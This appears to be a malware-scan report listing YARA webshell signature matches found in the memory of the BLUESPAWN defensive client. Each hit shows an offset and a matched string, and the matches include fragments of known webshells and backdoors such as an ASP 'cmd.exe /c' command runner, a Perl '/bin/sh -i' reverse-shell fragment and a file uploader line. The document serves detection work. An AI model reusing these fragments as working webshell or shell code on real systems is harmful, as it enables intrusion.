- 0x316888:$s9: // a simple php backdoor
- 0x35d5aa:$s9: // a simple php backdoor
- 0x368d93:$s9: // a simple php backdoor
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | sig_2005Gray | Webshells Auto-generated - file 2005Gray.asp | Yara Bulk Rule Generator by Florian Roth | - 0x3169c0:$s0: SCROLLBAR-FACE-COLOR: #e8e7e7;
- 0x368e5d:$s0: SCROLLBAR-FACE-COLOR: #e8e7e7;
- 0x3169eb:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x31791f:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x368e7e:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x369904:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x316a48:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x31797c:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x368ed1:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x369957:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x316a9b:$s9: SCROLLBAR-3DLIGHT-COLOR: #cccccc;
- 0x368f1a:$s9: SCROLLBAR-3DLIGHT-COLOR: #cccccc;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DllInjection | Webshells Auto-generated - file DllInjection.exe | Yara Bulk Rule Generator by Florian Roth | - 0x316be0:$s0: \BDoor\DllInjecti
- 0x368ff1:$s0: \BDoor\DllInjecti
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mithril_v1_45_Mithril | Webshells Auto-generated - file Mithril.exe | Yara Bulk Rule Generator by Florian Roth | - 0x316d19:$s2: cress.exe
- 0x31bdd9:$s2: cress.exe
- 0x3690bc:$s2: cress.exe
- 0x36c862:$s2: cress.exe
- 0x316d2f:$s7: \Debug\Mithril.
- 0x3690c8:$s7: \Debug\Mithril.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hkshell_hkrmv | Webshells Auto-generated - file hkrmv.exe | Yara Bulk Rule Generator by Florian Roth | - 0x316e5c:$s5: /THUMBPOSITION7
- 0x369187:$s5: /THUMBPOSITION7
- 0x316e78:$s6: \EvilBlade\
- 0x369199:$s6: \EvilBlade\
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpshell | Webshells Auto-generated - file phpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x316f9f:$s1: echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><b
- 0x369252:$s1: echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><b
- 0x316ffc:$s2: $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_UR
- 0x3692a5:$s2: $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_UR
- 0x317059:$s3: $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\",
- 0x3692f8:$s3: $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\",
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_cmd | Webshells Auto-generated - file cmd.asp | Yara Bulk Rule Generator by Florian Roth | - 0x2d63c8:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2dc850:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2e1d7f:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x309fdf:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3171c1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x33b557:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x33f92e:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x34331a:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x35fc16:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3693f2:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2d6463:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x2e1dcd:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f48:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314eeb:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x31720f:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x33b5de:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x34335e:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x35fb91:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x367b62:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x369436:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_phpft | Webshells Auto-generated - file phpft.php | Yara Bulk Rule Generator by Florian Roth | - 0x317384:$s6: PHP Files Thief
- 0x36953d:$s6: PHP Files Thief
- 0x2eead6:$s11: http://www.4ngel.net
- 0x2f6413:$s11: http://www.4ngel.net
- 0x3173a0:$s11: http://www.4ngel.net
- 0x34ba80:$s11: http://www.4ngel.net
- 0x351215:$s11: http://www.4ngel.net
- 0x369550:$s11: http://www.4ngel.net
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_indexer | Webshells Auto-generated - file indexer.asp | Yara Bulk Rule Generator by Florian Roth | - 0x3174d4:$s3: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="r
- 0x369616:$s3: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="r
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | r57shell | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x317640:$s11: $_POST['cmd']="echo \"Now script try connect to
- 0x369715:$s11: $_POST['cmd']="echo \"Now script try connect to
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | bdcli100 | Webshells Auto-generated - file bdcli100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31778c:$s5: unable to connect to
- 0x3697f3:$s5: unable to connect to
- 0x3177ae:$s8: backdoor is corrupted on
- 0x36980b:$s8: backdoor is corrupted on
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_2005Red | Webshells Auto-generated - file 2005Red.asp | Yara Bulk Rule Generator by Florian Roth | - 0x3178ef:$s0: scrollbar-darkshadow-color:#FF9DBB;
- 0x3698de:$s0: scrollbar-darkshadow-color:#FF9DBB;
- 0x3169eb:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x31791f:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x368e7e:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x369904:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x316a48:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x31797c:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x368ed1:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x369957:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop2006_rar_Folder_2006X2 | Webshells Auto-generated - file 2006X2.exe | Yara Bulk Rule Generator by Florian Roth | - 0x30e565:$s2: Powered By
- 0x317aef:$s2: Powered By
- 0x3630ad:$s2: Powered By
- 0x369a5c:$s2: Powered By
- 0x317b07:$s3: " onClick="this.form.sharp.name=this.form.password.value;this.form.action=this.
- 0x369a6a:$s3: " onClick="this.form.sharp.name=this.form.password.value;this.form.action=this.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | rdrbs084 | Webshells Auto-generated - file rdrbs084.exe | Yara Bulk Rule Generator by Florian Roth | - 0x317c73:$s0: Create mapped port. You have to specify domain when using HTTP type.
- 0x369b68:$s0: Create mapped port. You have to specify domain when using HTTP type.
- 0x317cc4:$s8: <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET
- 0x369baf:$s8: <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_CaseSwitch_2005 | Webshells Auto-generated - file 2005.exe | Yara Bulk Rule Generator by Florian Roth | - 0x317e34:$s1: MSComDlg.CommonDialog
- 0x369cb1:$s1: MSComDlg.CommonDialog
- 0x317e56:$s2: CommonDialog1
- 0x369cc9:$s2: CommonDialog1
- 0x317e70:$s3: __vbaExceptHandler
- 0x31d5e9:$s3: __vbaExceptHandler
- 0x369cd9:$s3: __vbaExceptHandler
- 0x36d8ab:$s3: __vbaExceptHandler
- 0x317e8f:$s4: EVENT_SINK_Release
- 0x31d608:$s4: EVENT_SINK_Release
- 0x369cee:$s4: EVENT_SINK_Release
- 0x36d8c0:$s4: EVENT_SINK_Release
- 0x317eae:$s5: EVENT_SINK_AddRef
- 0x369d03:$s5: EVENT_SINK_AddRef
- 0x317ecc:$s6: By Marcos
- 0x369d17:$s6: By Marcos
- 0x317ee2:$s7: EVENT_SINK_QueryInterface
- 0x369d23:$s7: EVENT_SINK_QueryInterface
- 0x317f08:$s8: MethCallEngine
- 0x369d3f:$s8: MethCallEngine
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | eBayId_index3 | Webshells Auto-generated - file index3.php | Yara Bulk Rule Generator by Florian Roth | - 0x318035:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
- 0x31c317:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
- 0x369dfe:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
- 0x36cbd3:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_phvayv | Webshells Auto-generated - file phvayv.php | Yara Bulk Rule Generator by Florian Roth | - 0x318190:$s2: wrap="OFF">XXXX</textarea></font><font face
- 0x369eeb:$s2: wrap="OFF">XXXX</textarea></font><font face
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | byshell063_ntboot | Webshells Auto-generated - file ntboot.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3182de:$s0: SYSTEM\CurrentControlSet\Services\NtBoot
- 0x369fcb:$s0: SYSTEM\CurrentControlSet\Services\NtBoot
- 0x318313:$s1: Failure ... Access is Denied !
- 0x319555:$s1: Failure ... Access is Denied !
- 0x369ff6:$s1: Failure ... Access is Denied !
- 0x36ac70:$s1: Failure ... Access is Denied !
- 0x31833e:$s2: Dumping Description to Registry...
- 0x3195ae:$s2: Dumping Description to Registry...
- 0x36a017:$s2: Dumping Description to Registry...
- 0x36acb5:$s2: Dumping Description to Registry...
- 0x31836d:$s3: Opening Service .... Failure !
- 0x3195dd:$s3: Opening Service .... Failure !
- 0x36a03c:$s3: Opening Service .... Failure !
- 0x36acda:$s3: Opening Service .... Failure !
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_casus15_2 | Webshells Auto-generated - file casus15.php | Yara Bulk Rule Generator by Florian Roth | - 0x2f3972:$s0: copy ( $dosya_gonder
- 0x3184ad:$s0: copy ( $dosya_gonder
- 0x34f236:$s0: copy ( $dosya_gonder
- 0x36a10e:$s0: copy ( $dosya_gonder
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | installer | Webshells Auto-generated - file installer.cmd | Yara Bulk Rule Generator by Florian Roth | - 0x3185df:$s0: Restore Old Vanquish
- 0x36a1d2:$s0: Restore Old Vanquish
- 0x318600:$s4: ReInstall Vanquish
- 0x36a1e9:$s4: ReInstall Vanquish
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | uploader | Webshells Auto-generated - file uploader.php | Yara Bulk Rule Generator by Florian Roth | - 0x2f57d2:$s0: move_uploaded_file($userfile, "entrika.php");
- 0x30885f:$s0: move_uploaded_file($userfile, "entrika.php");
- 0x350914:$s0: move_uploaded_file($userfile, "entrika.php");
- 0x35ea92:$s0: move_uploaded_file($userfile, "entrika.php");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_remview_2 | Webshells Auto-generated - file remview.php | Yara Bulk Rule Generator by Florian Roth | - 0x318734:$s0: <xmp>$out</
- 0x36a2af:$s0: <xmp>$out</
- 0x31874c:$s1: .mm("Eval PHP code").
- 0x31bbed:$s1: .mm("Eval PHP code").
- 0x36a2bd:$s1: .mm("Eval PHP code").
- 0x36c715:$s1: .mm("Eval PHP code").
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_r57 | Webshells Auto-generated - file r57.php | Yara Bulk Rule Generator by Florian Roth | - 0x31888c:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file'].
- 0x36a38f:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file'].
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop2006_rar_Folder_2006X | Webshells Auto-generated - file 2006X.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3189e9:$s1: <input name="password" type="password" id="password"
- 0x36a47e:$s1: <input name="password" type="password" id="password"
- 0x318a2a:$s6: name="theAction" type="text" id="theAction"
- 0x36a4b5:$s6: name="theAction" type="text" id="theAction"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_phvayv_2 | Webshells Auto-generated - file phvayv.php | Yara Bulk Rule Generator by Florian Roth | - 0x318b75:$s2: rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font
- 0x36a592:$s2: rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | elmaliseker | Webshells Auto-generated - file elmaliseker.asp | Yara Bulk Rule Generator by Florian Roth | - 0x318cd2:$s0: javascript:Command('Download'
- 0x36a681:$s0: javascript:Command('Download'
- 0x318cfc:$s5: zombie_array=array(
- 0x36a6a1:$s5: zombie_array=array(
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shelltools_g0t_root_resolve | Webshells Auto-generated - file resolve.exe | Yara Bulk Rule Generator by Florian Roth | - 0x318e3d:$s0: 3^n6B(Ed3
- 0x36a774:$s0: 3^n6B(Ed3
- 0x318e53:$s1: ^uldn'Vt(x
- 0x36a780:$s1: ^uldn'Vt(x
- 0x318e6a:$s2: \= uPKfp
- 0x36a78d:$s2: \= uPKfp
- 0x318e7f:$s3: 'r.axV<ad
- 0x36a798:$s3: 'r.axV<ad
- 0x318e95:$s4: p,modoi$=sr(
- 0x36a7a4:$s4: p,modoi$=sr(
- 0x318eae:$s5: DiamondC8S t
- 0x36a7b3:$s5: DiamondC8S t
- 0x318ec7:$s6: `lQ9fX<ZvJW
- 0x36a7c2:$s6: `lQ9fX<ZvJW
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_RemExp | Webshells Auto-generated - file RemExp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x318ff0:$s1: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.Ser
- 0x36a87d:$s1: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.Ser
- 0x31904d:$s5: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=F
- 0x36a8d0:$s5: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=F
- 0x3190aa:$s6: <td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></
- 0x36a923:$s6: <td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_tool | Webshells Auto-generated - file tool.asp | Yara Bulk Rule Generator by Florian Roth | - 0x319214:$s7: ""%windir%\\calc.exe"")
- 0x36aa1f:$s7: ""%windir%\\calc.exe"")
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x319358:$s0: window.open(""&url&"?id=edit&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp
- 0x36aaf5:$s0: window.open(""&url&"?id=edit&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp
- 0x3193b5:$s3: <input name="dbname" type="hidden" id="dbname" value="<%=request("dbname")%>">
- 0x36ab48:$s3: <input name="dbname" type="hidden" id="dbname" value="<%=request("dbname")%>">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | byloader | Webshells Auto-generated - file byloader.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31951f:$s0: SYSTEM\CurrentControlSet\Services\NtfsChk
- 0x36ac44:$s0: SYSTEM\CurrentControlSet\Services\NtfsChk
- 0x318313:$s1: Failure ... Access is Denied !
- 0x319555:$s1: Failure ... Access is Denied !
- 0x369ff6:$s1: Failure ... Access is Denied !
- 0x36ac70:$s1: Failure ... Access is Denied !
- 0x319580:$s2: NTFS Disk Driver Checking Service
- 0x36ac91:$s2: NTFS Disk Driver Checking Service
- 0x31833e:$s3: Dumping Description to Registry...
- 0x3195ae:$s3: Dumping Description to Registry...
- 0x36a017:$s3: Dumping Description to Registry...
- 0x36acb5:$s3: Dumping Description to Registry...
- 0x31836d:$s4: Opening Service .... Failure !
- 0x3195dd:$s4: Opening Service .... Failure !
- 0x36a03c:$s4: Opening Service .... Failure !
- 0x36acda:$s4: Opening Service .... Failure !
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shelltools_g0t_root_Fport | Webshells Auto-generated - file Fport.exe | Yara Bulk Rule Generator by Florian Roth | - 0x319725:$s4: Copyright 2000 by Foundstone, Inc.
- 0x36adb4:$s4: Copyright 2000 by Foundstone, Inc.
- 0x319754:$s5: You must have administrator privileges to run fport - exiting...
- 0x36add9:$s5: You must have administrator privileges to run fport - exiting...
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | BackDooR__fr_ | Webshells Auto-generated - file BackDooR (fr).php | Yara Bulk Rule Generator by Florian Roth | - 0x3198ba:$s3: print("<p align=\"center\"><font size=\"5\">Exploit include
- 0x36aed1:$s3: print("<p align=\"center\"><font size=\"5\">Exploit include
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_ntdaddy | Webshells Auto-generated - file ntdaddy.asp | Yara Bulk Rule Generator by Florian Roth | - 0x319a16:$s1: <input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="s
- 0x36afbf:$s1: <input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="s
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | nstview_nstview | Webshells Auto-generated - file nstview.php | Yara Bulk Rule Generator by Florian Roth | - 0x319b85:$s4: open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
- 0x36b0c0:$s4: open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_upload | Webshells Auto-generated - file upload.asp | Yara Bulk Rule Generator by Florian Roth | - 0x319cfb:$s0: PageUpload Below -->
- 0x36b1c8:$s0: PageUpload Below -->
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PasswordReminder | Webshells Auto-generated - file PasswordReminder.exe | Yara Bulk Rule Generator by Florian Roth | - 0x319e40:$s3: The encoded password is found at 0x%8.8lx and has a length of %d.
- 0x36b29f:$s3: The encoded password is found at 0x%8.8lx and has a length of %d.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Pack_InjectT | Webshells Auto-generated - file InjectT.exe | Yara Bulk Rule Generator by Florian Roth | - 0x319fa0:$s3: ail To Open Registry
- 0x320088:$s3: ail To Open Registry
- 0x36b391:$s3: ail To Open Registry
- 0x36f580:$s3: ail To Open Registry
- 0x319fc1:$s4: 32fDssignim
- 0x36b3a8:$s4: 32fDssignim
- 0x319fd9:$s5: vide Internet S
- 0x36b3b6:$s5: vide Internet S
- 0x319ff5:$s6: d]Software\M
- 0x36b3c8:$s6: d]Software\M
- 0x31a00e:$s7: TInject.Dll
- 0x36b3d7:$s7: TInject.Dll
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_RemExp_2 | Webshells Auto-generated - file RemExp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31a139:$s2: Then Response.Write "
- 0x36b494:$s2: Then Response.Write "
- 0x31a15c:$s3: <a href= "<%=Request.ServerVariables("script_name")%>
- 0x36b4ad:$s3: <a href= "<%=Request.ServerVariables("script_name")%>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_c99 | Webshells Auto-generated - file c99.php | Yara Bulk Rule Generator by Florian Roth | - 0x31a2a9:$s2: "txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htacce
- 0x36b58c:$s2: "txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htacce
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | rknt_zip_Folder_RkNT | Webshells Auto-generated - file RkNT.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31a40f:$s0: PathStripPathA
- 0x36b684:$s0: PathStripPathA
- 0x31a42a:$s1: `cLGet!Addr%
- 0x36b695:$s1: `cLGet!Addr%
- 0x3139b9:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x31a443:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x366d10:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x36b6a4:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x31a49e:$s3: oQToOemBuff* <=
- 0x36b6f5:$s3: oQToOemBuff* <=
- 0x31a4ba:$s4: ionCdunAsw[Us'
- 0x36b707:$s4: ionCdunAsw[Us'
- 0x31a4d5:$s6: CreateProcessW: %S
- 0x36b718:$s6: CreateProcessW: %S
- 0x31a4f4:$s7: ImageDirectoryEntryToData
- 0x36b72d:$s7: ImageDirectoryEntryToData
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | dbgntboot | Webshells Auto-generated - file dbgntboot.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31a62b:$s2: now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp
- 0x36b7f6:$s2: now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp
- 0x31a688:$s3: sth junk the M$ Wind0wZ retur
- 0x36b849:$s3: sth junk the M$ Wind0wZ retur
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_shell | Webshells Auto-generated - file shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x31a7bf:$s0: AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz
- 0x36b912:$s0: AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz
- 0x31a818:$s11: 1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s
- 0x36b962:$s11: 1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hxdef100 | Webshells Auto-generated - file hxdef100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31a980:$s0: RtlAnsiStringToUnicodeString
- 0x36ba5c:$s0: RtlAnsiStringToUnicodeString
- 0x31a9a9:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x31aefe:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x36ba7b:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x36be18:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x31a9e0:$s9: \\.\mailslot\hxdef-rk100sABCDEFGH
- 0x36baa8:$s9: \\.\mailslot\hxdef-rk100sABCDEFGH
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | rdrbs100 | Webshells Auto-generated - file rdrbs100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ab1d:$s3: Server address must be IP in A.B.C.D format.
- 0x36bb77:$s3: Server address must be IP in A.B.C.D format.
- 0x31ab56:$s4: mapped ports in the list. Currently
- 0x36bba6:$s4: mapped ports in the list. Currently
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mithril_Mithril | Webshells Auto-generated - file Mithril.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ac9d:$s0: OpenProcess error!
- 0x36bc7f:$s0: OpenProcess error!
- 0x31acbc:$s1: WriteProcessMemory error!
- 0x36bc94:$s1: WriteProcessMemory error!
- 0x31ace2:$s4: GetProcAddress error!
- 0x36bcb0:$s4: GetProcAddress error!
- 0x31ad04:$s5: HHt`HHt\
- 0x36bcc8:$s5: HHt`HHt\
- 0x31ad19:$s6: Cmaudi0
- 0x36bcd3:$s6: Cmaudi0
- 0x31ad2d:$s7: CreateRemoteThread error!
- 0x36bcdd:$s7: CreateRemoteThread error!
- 0x180d8f:$s8: Kernel32
- 0x18105c:$s8: Kernel32
- 0x183347:$s8: Kernel32
- 0x1833d4:$s8: Kernel32
- 0x1a6322:$s8: Kernel32
- 0x1a657f:$s8: Kernel32
- 0x1fa147:$s8: Kernel32
- 0x1fac56:$s8: Kernel32
- 0x20a9f9:$s8: Kernel32
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hxdef100_2 | Webshells Auto-generated - file hxdef100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ae9b:$s0: \\.\mailslot\hxdef-rkc000
- 0x36bdc9:$s0: \\.\mailslot\hxdef-rkc000
- 0x31aec1:$s2: Shared Components\On Access Scanner\BehaviourBlo
- 0x36bde5:$s2: Shared Components\On Access Scanner\BehaviourBlo
- 0x31a9a9:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x31aefe:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x36ba7b:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x36be18:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Release_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31b04a:$s0: ;;;Y;`;d;h;l;p;t;x;|;
- 0x36bef6:$s0: ;;;Y;`;d;h;l;p;t;x;|;
- 0x31b06c:$s1: 0 0&00060K0R0X0f0l0q0w0
- 0x36bf0e:$s1: 0 0&00060K0R0X0f0l0q0w0
- 0x31b090:$s2: : :$:(:,:0:4:8:D:`=d=
- 0x36bf28:$s2: : :$:(:,:0:4:8:D:`=d=
- 0x31b0b2:$s3: 4@5P5T5\5T7\7d7l7t7|7
- 0x36bf40:$s3: 4@5P5T5\5T7\7d7l7t7|7
- 0x31b0d4:$s4: 1,121>1C1K1Q1X1^1e1k1s1y1
- 0x36bf58:$s4: 1,121>1C1K1Q1X1^1e1k1s1y1
- 0x31b0fa:$s5: 9 9$9(9,9P9X9\9`9d9h9l9p9t9x9|9
- 0x36bf74:$s5: 9 9$9(9,9P9X9\9`9d9h9l9p9t9x9|9
- 0x31b126:$s6: 0)0O0\0a0o0"1E1P1q1
- 0x36bf96:$s6: 0)0O0\0a0o0"1E1P1q1
- 0x31b146:$s7: <.<I<d<h<l<p<t<x<|<
- 0x36bfac:$s7: <.<I<d<h<l<p<t<x<|<
- 0x31b166:$s8: 3&31383>3F3Q3X3`3f3w3|3
- 0x36bfc2:$s8: 3&31383>3F3Q3X3`3f3w3|3
- 0x31b18a:$s9: 8@;D;H;L;P;T;X;\;a;9=W=z=
- 0x36bfdc:$s9: 8@;D;H;L;P;T;X;\;a;9=W=z=
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webadmin | Webshells Auto-generated - file webadmin.php | Yara Bulk Rule Generator by Florian Roth | - 0x31b2bf:$s0: <input name=\"editfilename\" type=\"text\" class=\"style1\" value='".$this->inpu
- 0x36c0a3:$s0: <input name=\"editfilename\" type=\"text\" class=\"style1\" value='".$this->inpu
